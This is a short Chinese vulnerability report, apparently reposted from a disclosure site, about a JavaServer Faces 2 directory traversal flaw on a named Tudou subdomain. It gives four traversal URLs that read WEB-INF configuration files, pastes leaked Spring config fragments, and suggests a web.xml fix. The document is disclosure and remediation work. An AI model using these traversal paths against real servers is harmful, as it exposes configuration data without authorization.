首页 » 漏洞 » 土豆网某站点存在JavaServer Faces 2目录遍历漏洞

土豆网某站点存在JavaServer Faces 2目录遍历漏洞

 

土豆网某站点存在JavaServer Faces 2目录遍历漏洞,默认无法读取.properties文件,所以利用价值不高

目录遍历位于:


http://activity.tudou.com/javax.faces.resource.../WEB-INF/web.xml.jsf
http://activity.tudou.com/javax.faces.resource.../WEB-INF/classes/spring/spring-servlet.xml.jsf
http://activity.tudou.com/javax.faces.resource.../WEB-INF/classes/spring/main.xml.jsf
http://activity.tudou.com/javax.faces.resource.../WEB-INF/velocity/toolbox.xml.jsf

默认的,是无法读取


.class
.jsp
.jspx
.properties
.xhtml
.groovy

所以利用价值相对低


vc:resources location="/static/" mapping="/static/**">class="org.springframework.web.servlet.view.velocity.VelocityViewResolver">



class="org.springframework.web.servlet.view.velocity.VelocityConfigurer">

解决方案:

升级 或者修改web.xml,排除.xml



javax.faces.RESOURCE_EXCLUDES
.xhtml .class .jsp .jspx .properties .xml

原文链接:土豆网某站点存在JavaServer Faces 2目录遍历漏洞,转载请注明来源!

0